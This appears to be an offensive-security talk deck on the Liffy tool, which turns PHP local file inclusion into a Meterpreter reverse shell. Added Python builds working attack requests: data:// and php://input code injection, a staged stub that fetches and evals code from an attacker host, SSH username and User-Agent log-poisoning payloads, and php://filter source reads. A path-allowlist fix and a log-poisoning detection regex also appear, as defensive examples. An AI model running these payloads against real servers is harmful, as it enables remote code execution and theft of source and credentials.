From Ashy To Classy: LFI Exploitation with Liffy
Agenda
- File Inclusion Vulnerability History and Overview
- Liffy Introduction
- Techniques
- Considerations
- Future Development
#whoami
- Application Security Practice Manager @VerSprite – We love product security!
- I <3 Python and Java
- Enterprise WebApp background
- CTF player and boot2rooter
- Twitter: @rotlogix
- Personal blog: http://rotlogix.com
LFI History and Overview
What is it?
"The process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application." – https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
- The issue is with include() and require(): whatever file they are pointed at is evaluated as PHP, so an attacker-chosen path means untrusted code evaluation (or, at minimum, arbitrary file reads)
- Example: <?php include($_GET['file']); ?> is hit with http://target/find.php?file=/etc/passwd
- Example: <?php include("files/".$_GET['file'].".php"); ?> requires traversal ("../../") to leave the files/ directory and a null byte (%00) to drop the appended ".php"; null-byte truncation of include paths was fixed in PHP 5.3.4, so the second form is only fully exploitable on older interpreters
- The problem is passing a user-controlled URL parameter as the file argument of an include or require statement.
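The fix the two vulnerable include() lines above need is a canonicalising allowlist check, not a string filter. The Python below is an added example written for this page (it is not code from the slides or from Liffy) and shows that check against the slide's own inputs: a traversal, a null-byte suffix bypass, an absolute path and a stream wrapper. The web root, file names and `safe_include_path`/`demo` names are constructed for the illustration.

```python
import os
import tempfile
from typing import Dict, Optional

# Added example, not code from the slides: the canonicalising allowlist
# check the vulnerable include() above lacks, written here in Python.
# base_dir, the file names and the web root are constructed for the demo.


def safe_include_path(base_dir: str, user_value: str, suffix: str = ".php") -> Optional[str]:
    """Return the canonical path of base_dir/<user_value><suffix> if it is a
    regular file inside base_dir, otherwise None.

    Rejects the three things the slide's attacks rely on: null bytes (the
    %00 suffix-truncation trick), stream wrappers (anything with a scheme
    colon such as php://, data:, expect://) and traversal out of base_dir
    (including absolute paths, which os.path.join would let replace base_dir).
    """
    if "\x00" in user_value or ":" in user_value:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value + suffix))
    # realpath() resolves symlinks and '..' first, so a prefix test on the
    # result is sound; a plain string check on user_value is not.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo() -> Dict[str, Optional[str]]:
    """Constructed web root: files/home.php inside the include directory,
    secret.php one level above it. Returns the verdict for each input."""
    root = tempfile.mkdtemp()
    files = os.path.join(root, "files")
    os.mkdir(files)
    with open(os.path.join(files, "home.php"), "w") as fh:
        fh.write("<?php echo 'home'; ?>")
    with open(os.path.join(root, "secret.php"), "w") as fh:
        fh.write("<?php $db_pass = 's3cret'; ?>")
    return {
        "home": safe_include_path(files, "home"),                    # legitimate page: allowed
        "traversal": safe_include_path(files, "../secret"),          # ../ escapes base_dir: rejected
        "nullbyte": safe_include_path(files, "../secret.php\x00"),   # %00 suffix bypass: rejected
        "absolute": safe_include_path(files, "/etc/passwd"),         # join() would drop base_dir: rejected
        "wrapper": safe_include_path(files, "php://filter/convert.base64-encode/resource=home"),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:10s} -> {verdict}")
```

The check canonicalises first and compares afterwards; filtering `../` out of the raw string is the classic mistake because encodings and `....//` variants slip past it, while a `realpath()` prefix test has nothing to bypass.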
LFI History and Overview: GitHub LULZ
LFI History and Overview
- File inclusion vulnerabilities have been around forever (2002?)
- Around 340 "inclusion"-related entries on Exploit-DB over the last 5 years
- The vulnerability was dropped from the OWASP Top 10 in 2010
- My opinion? Doesn't matter. Consider all the legacy PHP applications out there, and plugin development for things like WordPress
Liffy Introduction
- A tool that attempts to turn a seemingly "read-only" LFI vulnerability into a full-blown PHP Meterpreter web shell
- Developed in Python
- Currently has 10 features, which we will discuss
- Uses Python's SimpleHTTPServer library to spawn a web server as needed for payload staging
- Major enhancements added by Dan 'unicornFurnace' Crowley @SpiderLabs
Liffy Feature Overview
- data:// – stream wrapper (code execution)
- php://input – stream wrapper (code execution)
- php://filter – stream wrapper (file reads)
- expect:// – process control (PECL expect extension) wrapper (code execution); not part of a default PHP build
- /proc/self/environ – CGI mode (code execution)
- Apache access log poisoning (code execution)
- Linux auth log poisoning (code execution)
- Support for absolute and relative paths (log poisoning)
- Support for cookies
- Direct or staged payload delivery
Payload Generation
- Leverages msfpayload (since superseded by msfvenom in Metasploit)
- PHP Meterpreter Reverse TCP (php/meterpreter/reverse_tcp)
- Liffy lets you specify your own LHOST and LPORT for the Meterpreter
- Creates a corresponding resource file which loads a multi/handler
Direct & Staged Payloads
This simply means either executing your payload directly, or using additional code to download and execute your payload, through the chosen technique (data://, php://input, etc.).
Staged delivery (the target must be able to reach your web server outbound):
- Generate the PHP Meterpreter through msfpayload (stored at /tmp/{random}.php)
- Encode and use <?php eval(file_get_contents('http://local:8000/{random}.php')) ?>
- Spawn a temporary web server to host the shell out of the /tmp directory
- The stager downloads and executes the shell
- The listening handler catches the reverse shell
Direct delivery:
- Generate the PHP Meterpreter through msfpayload (stored at /tmp/{random}.php)
- Read the payload from the stored file (/tmp/{random}.php)
- Encode it and send it directly through the wrapper: data://text/html;base64,{payload}
- The listening handler catches the reverse shell
Techniques: data://
- RFC 2397 – data URL scheme: "Allows the inclusion of small data items as 'immediate' data, as if it had been included externally"
- Stream wrapper supported since PHP 5.2.0
- Usage: data://text/html;base64,{encoded code here}
- Restricted by allow_url_include (enabled/disabled), set in php.ini; it is Off by default, so this technique only works where an administrator has turned it on
- If it is enabled you potentially have an RFI as well: "Allows the use of URL-aware file open wrappers with functions like include"
Techniques: data://
How do we use this?
http://target.com/lfi.php?file=data://text/html;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=
<?php system('whoami'); ?> = PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=
Techniques: data://
How does Liffy use this?
Non-staged:
- Generate the payload with msfpayload and the resource file
- Read the payload from the generated file
- Encode the payload
- Load the listening handler for reverse connections
- Deliver it directly: data://text/html;base64,{payload}
Staged:
- Generate the payload with msfpayload and the resource file
- Encode <?php eval(file_get_contents('http://attacker:8000/{shell}.php')) ?>
- Load the listening handler for reverse connections
- Spawn the web server to host the payload
- Execute
Techniques: data:// > DEMO!
Techniques: php://input
- Read-only stream wrapper
- Exposes the raw body of the current request, so with a POST the PHP code goes in the request body instead of the URL
- Restricted by allow_url_include, exactly like data://
Techniques: php://input
How does Liffy implement this technique?
- Exactly the same as data://
- Staged and non-staged approach
- Really you should always choose non-staged in this scenario: the POST body already carries the payload to the target, so there is nothing to gain from staging. POST (direct delivery) = non-staged
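The direct and staged deliveries for data:// (slides 10 to 13) and the php://input variant (slides 15 and 16) reduce to a few request-building steps. The Python below is an added example for this page, not Liffy's code: it builds the data:// URL, the staged stub and the php://input POST, and the target URL, parameter name and attacker host/port/file name are placeholders. The `whoami` payload and its base64 form are the ones from slide 12.

```python
import base64
import urllib.request
from typing import Dict, Optional, Tuple
from urllib.parse import urlencode

# Added example, not Liffy's code. target_url, the 'file' parameter and the
# attacker host/port/file name below are placeholders for this illustration.

STAGER_TEMPLATE = "<?php eval(file_get_contents('http://{host}:{port}/{name}')); ?>"


def stager(host: str, port: int, name: str) -> str:
    """Staged delivery: a small stub that fetches the real shell from the
    attacker's web server and eval()s it. The target needs outbound access
    to host:port, and because eval() takes code without an opening tag, the
    hosted shell must hide its '<?php' (msf's PHP Meterpreter wraps it in a
    comment) or drop it."""
    return STAGER_TEMPLATE.format(host=host, port=port, name=name)


def data_wrapper(php_code: str) -> str:
    """Direct delivery: the code itself travels inside the data:// URI.
    base64 keeps quotes, spaces and newlines out of the query string."""
    return "data://text/html;base64," + base64.b64encode(php_code.encode()).decode()


def data_url(target_url: str, param: str, php_code: str) -> str:
    """GET URL for the data:// technique. urlencode() matters here: a raw
    '+' in the base64 would be decoded as a space by PHP and corrupt the
    payload."""
    return f"{target_url}?{urlencode({param: data_wrapper(php_code)})}"


def php_input_request(target_url: str, param: str, php_code: str) -> Tuple[str, Dict[str, str], bytes]:
    """Direct delivery through php://input: the wrapper name goes in the
    query string and the PHP code is the raw POST body. php://input *is* the
    request body, so there is nothing to stage. Avoid multipart/form-data,
    for which php://input is empty."""
    url = f"{target_url}?{urlencode({param: 'php://input'})}"
    headers = {"Content-Type": "text/plain"}
    return url, headers, php_code.encode()


def send(url: str, headers: Dict[str, str], body: Optional[bytes] = None) -> bytes:
    """Fire one request (GET without a body, POST with one) and return the
    response body. Not exercised offline."""
    method = "POST" if body is not None else "GET"
    req = urllib.request.Request(url, data=body, headers=headers, method=method)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


if __name__ == "__main__":
    code = "<?php system('whoami'); ?>"
    print(data_url("http://target.com/lfi.php", "file", code))
    print(data_url("http://target.com/lfi.php", "file", stager("10.0.0.1", 8000, "shell.php")))
    url, headers, body = php_input_request("http://target.com/lfi.php", "file", code)
    print(url, headers, body)
```

Before spending time on either wrapper, confirm `allow_url_include` is actually on: a response that echoes the literal `data://...` string back, or a "failed to open stream" warning, means the wrapper was not honoured and php://filter or log poisoning is the better next step.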
Techniques: php://input > DEMO!
Techniques: SSH auth.log Poisoning
- Assumes you can include the SSH auth.log
- If you can, there is usually a misconfiguration: the log is normally readable only by root (and the adm group on Debian-based systems), so a web server account that can read it has been given too much
- Inject PHP code through a failed login attempt, typically as the username, which sshd writes verbatim into its "Invalid user ... from ..." messages
- The code now appears in the auth.log
- Include the auth.log for code execution!
Techniques: SSH auth.log Poisoning
- Liffy implements this by creating a payload through msfpayload
- Reads the PHP payload and assigns it to "payload_1"
- Uses <?php eval($_GET['code']) ?> as "payload_2"
- The second payload is used to poison the auth.log
- The first payload is what is called after the final inclusion, via "&code="
- Supports path traversal sequences if needed: "../", "..", "/../"
Techniques: SSH auth.log Poisoning > DEMO!
Techniques: Apache access.log Poisoning
- Requires being able to include the access.log, which means you might have to ../../../ (/var/log/apache2/access.log)
- Poison the log through the User-Agent header by injecting PHP code
- Include the access.log and your PHP code gets evaluated
- Note that the poisoned line is permanent: it runs on every later inclusion of that log, and a parse error in a badly quoted payload breaks the whole include, so get the payload right the first time
Techniques: Apache access.log Poisoning
- If the log location isn't different (you should know this), Liffy defaults to the most common location
- Supports path traversal as we already saw with the auth.log
- Payload creation is the same, but with direct delivery only
- Encodes the payload in base64 and uses eval(base64_decode(...)); to get around double or single quotes causing parse errors
- Again, everything gets delivered through the User-Agent
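Both log-poisoning techniques (auth.log, slides 18 to 20, and access.log, slides 22 and 23) are a two-hop chain: plant a small stub in a file the server will log to, then include that file. The Python below is an added example for this page, not Liffy's implementation. It builds the SSH username and User-Agent payloads, the inclusion URL with the `&code=` second hop, and, for the defender, a scanner that flags poisoned lines. The sshd and Apache log lines are constructed to look like real output and were not captured from any host; the target URL, parameter and paths are placeholders.

```python
import base64
import re
from typing import List, Optional, Tuple
from urllib.parse import urlencode

# Added example, not Liffy's code. The log lines below are constructed to
# look like sshd and Apache output; they were not captured from a real host.
# The target URL, parameter name and log paths are placeholders.

STUB = "<?php eval($_GET['code']); ?>"


def auth_log_username(stub: str = STUB) -> str:
    """What to present as the SSH username: sshd writes the attempted name
    verbatim into its 'Invalid user ... from ...' messages, so the stub
    lands in auth.log. Quote it if you hand it to the ssh client."""
    return stub


def access_log_user_agent(php_code: str) -> str:
    """User-Agent value for access.log poisoning. Quotes inside php_code
    would be logged as-is and can leave the whole log un-includable with a
    parse error, so the code is base64'd and decoded at eval time."""
    b64 = base64.b64encode(php_code.encode()).decode()
    return f"<?php eval(base64_decode('{b64}')); ?>"


def decode_user_agent_payload(user_agent: str) -> str:
    """Reverse of access_log_user_agent(), to verify what was logged."""
    m = re.fullmatch(r"<\?php eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\); \?>", user_agent)
    if not m:
        raise ValueError("not a payload built by access_log_user_agent()")
    return base64.b64decode(m.group(1)).decode()


def inclusion_url(target_url: str, param: str, log_path: str, depth: int = 0, code: Optional[str] = None) -> str:
    """URL that includes the poisoned log. depth > 0 prefixes '../' for
    includes that prepend a directory to the parameter; code is sent as
    &code= for the eval($_GET['code']) stub, the second hop of the chain."""
    rel = ("../" * depth + log_path.lstrip("/")) if depth else log_path
    url = f"{target_url}?{param}={rel}"
    if code is not None:
        url += "&" + urlencode({"code": code})
    return url


# Constructed sample logs: one clean line each, then the poisoned ones.
SAMPLE_AUTH_LOG: List[str] = [
    "Mar  3 10:14:02 web1 sshd[2231]: Accepted publickey for deploy from 10.0.0.9 port 51022 ssh2",
    f"Mar  3 10:15:41 web1 sshd[2290]: Invalid user {auth_log_username()} from 10.0.0.5",
    f"Mar  3 10:15:43 web1 sshd[2290]: Failed password for invalid user {auth_log_username()} from 10.0.0.5 port 40112 ssh2",
]

SAMPLE_ACCESS_LOG: List[str] = [
    '10.0.0.5 - - [03/Mar/2015:10:20:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [03/Mar/2015:10:20:31 +0000] "GET / HTTP/1.1" 200 612 "-" "'
    + access_log_user_agent("<?php system('id'); ?>") + '"',
    '10.0.0.5 - - [03/Mar/2015:10:20:40 +0000] "GET /lfi.php?file=../../../var/log/apache2/access.log HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

# Detection side: PHP open tags or eval/exec-style calls in sshd or Apache logs.
POISON_RE = re.compile(
    r"<\?(?:php\b|=)|\b(?:eval|assert|base64_decode|system|passthru|shell_exec|exec)\s*\(",
    re.IGNORECASE,
)


def find_poisoned_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (index, line) for lines that look poisoned. Neither sshd nor
    Apache has a reason to log these strings, so a hit is a strong indicator
    that someone is setting up a log-inclusion chain."""
    return [(i, ln) for i, ln in enumerate(lines) if POISON_RE.search(ln)]


if __name__ == "__main__":
    print(inclusion_url("http://target.com/lfi.php", "file", "/var/log/auth.log", depth=3, code="system('id');"))
    for idx, line in find_poisoned_lines(SAMPLE_AUTH_LOG) + find_poisoned_lines(SAMPLE_ACCESS_LOG):
        print(idx, line)
```

The third access-log line (the inclusion request itself) is deliberately not flagged: it carries traversal but no PHP, so a complete detection rule pairs this scan with an alert on `../` sequences or log paths appearing in request parameters.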
Techniques: Apache access.log Poisoning > DEMO!
Techniques: php://filter
- Wrapper that permits applying filters to a stream when it is opened
- Takes a resource argument, which is what you want to read
- Used in conjunction with the base64 "conversion filter" (convert.base64-encode)
- Takes the resource > streams and reads the data > converts it to base64 > output is a base64-encoded string. Because the bytes reach the page as base64 text rather than PHP, the source is returned instead of being executed
- Example: http://target.com/vuln/lfi.php?file=php://filter/convert.base64-encode/resource=lfi.php
Techniques: php://filter
- Liffy automates this for you!
- Prompts you for a file that you want to read
- Decodes the encoded string and echoes the contents back to the terminal
- Useful for viewing PHP source from files you have access to
- Does not depend on allow_url_include, so it is often available when data:// and php://input are not
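The two php://filter steps above, build the URL and decode what comes back, have one practical wrinkle: the base64 blob arrives embedded in whatever HTML the vulnerable page wraps around its include() output, so decoding the whole response body fails. The Python below is an added example for this page, not Liffy's code; it builds the filter URL from slide 25 and recovers the source from a response with surrounding markup. The target URL and the sample response body are constructed for the illustration.

```python
import base64
import re
from urllib.parse import urlencode

# Added example, not Liffy's code: build the php://filter read from slide 25
# and recover the source from a response that has HTML around the base64.
# SAMPLE_SOURCE and SAMPLE_RESPONSE are constructed, not captured pages.


def filter_url(target_url: str, param: str, resource: str) -> str:
    """Ask the include() to hand back `resource` base64-encoded instead of
    executing it. urlencode() percent-encodes ':' '/' and '=', which PHP
    decodes back before the wrapper sees the string."""
    wrapper = "php://filter/convert.base64-encode/resource=" + resource
    return f"{target_url}?{urlencode({param: wrapper})}"


# A base64 run long enough not to be a stray word from the page's own HTML.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def recover_source(body: str) -> str:
    """Pull the longest base64 run out of the response and decode it.
    Missing '=' padding (some pages strip it) is tolerated."""
    runs = B64_RUN.findall(body)
    if not runs:
        raise ValueError("no base64 blob in response")
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


SAMPLE_SOURCE = (
    "<?php\n"
    "$conn = mysqli_connect('localhost', 'app', 's3cret');\n"
    "include($_GET['file']);\n"
    "?>"
)

SAMPLE_RESPONSE = (
    "<html><body><div class='content'>"
    + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
    + "</div></body></html>"
)


if __name__ == "__main__":
    print(filter_url("http://target.com/vuln/lfi.php", "file", "lfi.php"))
    print(recover_source(SAMPLE_RESPONSE))
```

Reading the vulnerable script itself (`resource=lfi.php`) is the usual first target: it reveals the exact include() expression, and therefore whether a suffix is appended, how deep a traversal must go and which files (config, credentials) the application references.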
Techniques: php://filter > DEMO!
Future Work
- Make the internal web server smarter and more reliable
- Better object-oriented design
- Re-write the command-line interface
- Dynamic request object building and re-use for everything HTTP
- Support bypassing filters for path traversals
- Write a custom PHP reverse shell with a built-in handler